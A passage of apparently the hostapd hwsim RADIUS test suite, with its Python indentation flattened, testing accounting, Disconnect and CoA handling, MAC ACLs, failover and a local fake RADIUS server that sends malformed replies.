# For now, do not report failures due to missing kernel support
raise HwsimSkip("Could not start hostapd - assume proxyarp not supported in kernel version")
bssid = apdev[0]['bssid']
subprocess.call(['brctl', 'setfd', 'ap-br0', '0'])
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'up'])
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
addr0 = dev[0].own_addr()
pkt = build_dhcp_ack(dst_ll="ff:ff:ff:ff:ff:ff", src_ll=bssid,
ip_src="192.168.1.1", ip_dst="255.255.255.255",
yiaddr="192.168.1.123", chaddr=addr0)
if "OK" not in hapd.request("DATA_TEST_FRAME ifname=ap-br0 " + binascii.hexlify(pkt).decode()):
raise Exception("DATA_TEST_FRAME failed")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
hapd.disable()
def send_and_check_reply(srv, req, code, error_cause=0):
reply = srv.SendPacket(req)
logger.debug("RADIUS response from hostapd")
for i in list(reply.keys()):
logger.debug("%s: %s" % (i, reply[i]))
if reply.code != code:
raise Exception("Unexpected response code")
if error_cause:
if 'Error-Cause' not in reply:
raise Exception("Missing Error-Cause")
if reply['Error-Cause'][0] != error_cause:
raise Exception("Unexpected Error-Cause: {}".format(reply['Error-Cause']))
def test_radius_acct_psk(dev, apdev):
"""RADIUS Accounting - PSK"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_params(ssid="radius-acct", passphrase="12345678")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", psk="12345678", scan_freq="2412")
def test_radius_acct_psk_sha256(dev, apdev):
"""RADIUS Accounting - PSK SHA256"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_params(ssid="radius-acct", passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", key_mgmt="WPA-PSK-SHA256",
psk="12345678", scan_freq="2412")
def test_radius_acct_ft_psk(dev, apdev):
"""RADIUS Accounting - FT-PSK"""
as_hapd = hostapd.Hostapd("as")
params = ft_params1(ssid="radius-acct", passphrase="12345678")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", key_mgmt="FT-PSK",
psk="12345678", scan_freq="2412")
def test_radius_acct_ieee8021x(dev, apdev):
"""RADIUS Accounting - IEEE 802.1X"""
skip_with_fips(dev[0])
as_hapd = hostapd.Hostapd("as")
params = hostapd.radius_params()
params["ssid"] = "radius-acct-1x"
params["ieee8021x"] = "1"
params["wep_key_len_broadcast"] = "13"
params["wep_key_len_unicast"] = "13"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct-1x", key_mgmt="IEEE8021X", eap="PSK",
identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
scan_freq="2412")
def test_radius_das_disconnect(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - Disconnect"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
params['own_ip_addr'] = "127.0.0.1"
params['nas_identifier'] = "nas.example.com"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].p2p_interface_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret=b"secret", dict=dict)
srv.retries = 1
srv.timeout = 1
logger.info("Disconnect-Request with incorrect secret")
req = radius_das.DisconnectPacket(dict=dict, secret=b"incorrect",
User_Name="foo",
NAS_Identifier="localhost",
Event_Timestamp=int(time.time()))
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with incorrect secret properly ignored")
logger.info("Disconnect-Request without Event-Timestamp")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="psk.user@example.com")
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request without Event-Timestamp properly ignored")
logger.info("Disconnect-Request with non-matching Event-Timestamp")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="psk.user@example.com",
Event_Timestamp=123456789)
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with non-matching Event-Timestamp properly ignored")
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="foo",
User_Password="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 401)
logger.info("Disconnect-Request with invalid Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="foo",
Calling_Station_Id="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 407)
logger.info("Disconnect-Request with mismatching User-Name")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Calling_Station_Id="12:34:56:78:90:aa",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Session_Id="12345678-87654321",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Session-Id (len)")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Session_Id="12345678",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Multi-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Multi_Session_Id="12345678+87654321",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Multi-Session-Id (len)")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Multi_Session_Id="12345678",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with no session identification attributes")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with mismatching NAS-IP-Address")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="192.168.3.4",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 403)
logger.info("Disconnect-Request with mismatching NAS-Identifier")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="unknown.example.com",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 403)
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with matching Acct-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Acct-Multi-Session-Id")
sta = hapd.get_sta(addr)
multi_sess_id = sta['authMultiSessionId']
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Multi_Session_Id=multi_sess_id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching User-Name")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="nas.example.com",
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED", "CTRL-EVENT-CONNECTED"])
if ev is None:
raise Exception("Timeout while waiting for re-connection")
if "CTRL-EVENT-EAP-STARTED" not in ev:
raise Exception("Unexpected skipping of EAP authentication in reconnection")
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Calling-Station-Id and non-matching CUI")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Calling_Station_Id=addr,
Chargeable_User_Identity="foo@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=503)
logger.info("Disconnect-Request with matching CUI")
dev[1].connect("radius-das", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-cui",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Chargeable_User_Identity="gpsk-chargeable-user-identity",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[1].wait_disconnected(timeout=10)
dev[1].wait_connected(timeout=10, error="Re-connection timed out")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
connect(dev[2], "radius-das")
logger.info("Disconnect-Request with matching User-Name - multiple sessions matching")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="nas.example.com",
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=508)
logger.info("Disconnect-Request with User-Name matching multiple sessions, Calling-Station-Id only one")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
ev = dev[2].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with matching Acct-Multi-Session-Id after disassociation")
sta = hapd.get_sta(addr)
multi_sess_id = sta['authMultiSessionId']
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Multi_Session_Id=multi_sess_id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].wait_connected(timeout=15)
logger.info("Disconnect-Request with matching User-Name after disassociation")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
dev[2].request("DISCONNECT")
dev[2].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with matching CUI after disassociation")
dev[1].request("DISCONNECT")
dev[1].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Chargeable_User_Identity="gpsk-chargeable-user-identity",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with matching Calling-Station-Id after disassociation")
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].wait_connected(timeout=15)
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with mismatching Calling-Station-Id after disassociation")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=503)
def add_message_auth_req(req):
req.authenticator = req.CreateAuthenticator()
hmac_obj = hmac.new(req.secret)
hmac_obj.update(struct.pack("B", req.code))
hmac_obj.update(struct.pack("B", req.id))
# request attributes
req.AddAttribute("Message-Authenticator", 16*b"\x00")
attrs = b''
for code,datalst in sorted(req.items()):
for data in datalst:
attrs += req._PktEncodeAttribute(code, data)
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(16*b"\x00") # all zeros Authenticator in calculation
hmac_obj.update(attrs)
del req[80]
req.AddAttribute("Message-Authenticator", hmac_obj.digest())
def test_radius_das_disconnect_time_window(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - Disconnect - time window"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
params['radius_das_require_message_authenticator'] = "1"
params['radius_das_time_window'] = "10"
params['own_ip_addr'] = "127.0.0.1"
params['nas_identifier'] = "nas.example.com"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].own_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret=b"secret", dict=dict)
srv.retries = 1
srv.timeout = 1
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()) - 50)
add_message_auth_req(req)
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with non-matching Event-Timestamp properly ignored")
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
add_message_auth_req(req)
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
def test_radius_das_coa(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - CoA"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].p2p_interface_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret=b"secret", dict=dict)
srv.retries = 1
srv.timeout = 1
# hostapd does not currently support CoA-Request, so NAK is expected
logger.info("CoA-Request with matching Acct-Session-Id")
req = radius_das.CoAPacket(dict=dict, secret=b"secret",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.CoANAK, error_cause=405)
def test_radius_ipv6(dev, apdev):
"""RADIUS connection over IPv6"""
params = {}
params['ssid'] = 'as'
params['beacon_int'] = '2000'
params['radius_server_clients'] = 'auth_serv/radius_clients_ipv6.conf'
params['radius_server_ipv6'] = '1'
params['radius_server_auth_port'] = '18129'
params['radius_server_acct_port'] = '18139'
params['eap_server'] = '1'
params['eap_user_file'] = 'auth_serv/eap_user.conf'
params['ca_cert'] = 'auth_serv/ca.pem'
params['server_cert'] = 'auth_serv/server.pem'
params['private_key'] = 'auth_serv/server.key'
hostapd.add_ap(apdev[1], params)
params = hostapd.wpa2_eap_params(ssid="radius-ipv6")
params['auth_server_addr'] = "::0"
params['auth_server_port'] = "18129"
params['acct_server_addr'] = "::0"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
params['own_ip_addr'] = "::0"
hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-ipv6")
def test_radius_macacl(dev, apdev):
"""RADIUS MAC ACL"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
hostapd.add_ap(apdev[0], params)
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
# Invalid VLAN ID from RADIUS server
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[2].request("REMOVE_NETWORK all")
dev[2].wait_disconnected()
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
def test_radius_macacl_acct(dev, apdev):
"""RADIUS MAC ACL and accounting enabled"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hostapd.add_ap(apdev[0], params)
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].request("DISCONNECT")
dev[1].wait_disconnected()
dev[1].request("RECONNECT")
def test_radius_macacl_oom(dev, apdev):
"""RADIUS MAC ACL and OOM"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "hostapd_allowed_address"):
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 2, "hostapd_allowed_address"):
dev[1].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[2].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 2, "=hostapd_allowed_address"):
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
def test_radius_macacl_unreachable(dev, apdev):
"""RADIUS MAC ACL and server unreachable"""
params = hostapd.radius_params()
params['auth_server_port'] = "18139"
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=3)
if ev is not None:
raise Exception("Unexpected connection")
logger.info("Fix authentication server port")
hapd.set("auth_server_port", "1812")
hapd.disable()
hapd.enable()
dev[0].wait_connected()
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
def test_radius_failover(dev, apdev):
"""RADIUS Authentication and Accounting server failover"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-failover")
params["auth_server_addr"] = "192.168.213.17"
params["auth_server_port"] = "1812"
params["auth_server_shared_secret"] = "testing"
params['acct_server_addr'] = "192.168.213.17"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "testing"
params['radius_retry_primary_interval'] = "20"
hapd = hostapd.add_ap(apdev[0], params, no_enable=True)
hapd.set("auth_server_addr", "127.0.0.1")
hapd.set("auth_server_port", "1812")
hapd.set("auth_server_shared_secret", "radius")
hapd.set('acct_server_addr', "127.0.0.1")
hapd.set('acct_server_port', "1813")
hapd.set('acct_server_shared_secret', "radius")
hapd.enable()
ev = hapd.wait_event(["AP-ENABLED", "AP-DISABLED"], timeout=30)
if ev is None:
raise Exception("AP startup timed out")
if "AP-ENABLED" not in ev:
raise Exception("AP startup failed")
start = os.times()[4]
try:
subprocess.call(['ip', 'ro', 'replace', 'prohibit', '192.168.213.17'])
dev[0].request("SET EAPOL::authPeriod 5")
connect(dev[0], "radius-failover", wait_connect=False)
dev[0].wait_connected(timeout=20)
finally:
dev[0].request("SET EAPOL::authPeriod 30")
subprocess.call(['ip', 'ro', 'del', '192.168.213.17'])
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e <= req_s:
raise Exception("Unexpected RADIUS server acct MIB value")
end = os.times()[4]
try:
subprocess.call(['ip', 'ro', 'replace', 'prohibit', '192.168.213.17'])
dev[1].request("SET EAPOL::authPeriod 5")
if end - start < 21:
time.sleep(21 - (end - start))
connect(dev[1], "radius-failover", wait_connect=False)
dev[1].wait_connected(timeout=20)
finally:
dev[1].request("SET EAPOL::authPeriod 30")
subprocess.call(['ip', 'ro', 'del', '192.168.213.17'])
def run_pyrad_server(srv, t_events):
srv.RunWithStop(t_events)
def test_radius_protocol(dev, apdev):
"""RADIUS Authentication protocol tests with a fake server"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
if self.t_events['msg_auth'].is_set():
logger.info("Add Message-Authenticator")
if self.t_events['wrong_secret'].is_set():
logger.info("Use incorrect RADIUS shared secret")
pw = b"incorrect"
else:
pw = reply.secret
hmac_obj = hmac.new(pw)
hmac_obj.update(struct.pack("B", reply.code))
hmac_obj.update(struct.pack("B", reply.id))
# reply attributes
reply.AddAttribute("Message-Authenticator", 16*b"\x00")
attrs = reply._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(pkt.authenticator)
hmac_obj.update(attrs)
if self.t_events['double_msg_auth'].is_set():
logger.info("Include two Message-Authenticator attributes")
else:
del reply[80]
reply.AddAttribute("Message-Authenticator", hmac_obj.digest())
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
b"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['msg_auth'] = threading.Event()
t_events['wrong_secret'] = threading.Event()
t_events['double_msg_auth'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
params = hostapd.wpa2_eap_params(ssid="radius-test")
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-test", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['msg_auth'].set()
t_events['wrong_secret'].set()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['wrong_secret'].clear()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['double_msg_auth'].set()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def build_tunnel_password(secret, authenticator, psk):
a = b"\xab\xcd"
psk = psk.encode()
padlen = 16 - (1 + len(psk)) % 16
if padlen == 16:
padlen = 0
p = struct.pack('B', len(psk)) + psk + padlen * b'\x00'
cc_all = bytes()
b = hashlib.md5(secret + authenticator + a).digest()
while len(p) > 0:
pp = bytearray(p[0:16])
p = p[16:]
bb = bytearray(b)
cc = bytearray(pp[i] ^ bb[i] for i in range(len(bb)))
cc_all += cc
b = hashlib.md5(secret + cc).digest()
data = b'\x00' + a + bytes(cc_all)
return data
def start_radius_psk_server(psk, invalid_code=False, acct_interim_interval=0,
session_timeout=0, reject=False):
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
if self.t_events['invalid_code']:
reply.code = pyrad.packet.AccessRequest
if self.t_events['reject']:
reply.code = pyrad.packet.AccessReject
data = build_tunnel_password(reply.secret, pkt.authenticator,
self.t_events['psk'])
reply.AddAttribute("Tunnel-Password", data)
if self.t_events['acct_interim_interval']:
reply.AddAttribute("Acct-Interim-Interval",
self.t_events['acct_interim_interval'])
if self.t_events['session_timeout']:
reply.AddAttribute("Session-Timeout",
self.t_events['session_timeout'])
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
b"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['psk'] = psk
t_events['invalid_code'] = invalid_code
t_events['acct_interim_interval'] = acct_interim_interval
t_events['session_timeout'] = session_timeout
t_events['reject'] = reject
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
return t, t_events
def hostapd_radius_psk_test_params():
params = hostapd.radius_params()
params['ssid'] = "test-wpa2-psk"
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['wpa_psk_radius'] = '2'
params['auth_server_port'] = "18138"
return params
def test_radius_psk(dev, apdev):
"""WPA2 with PSK from RADIUS"""
t, t_events = start_radius_psk_server("12345678")
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412")
t_events['psk'] = "0123456789abcdef"
dev[1].connect("test-wpa2-psk", psk="0123456789abcdef",
scan_freq="2412")
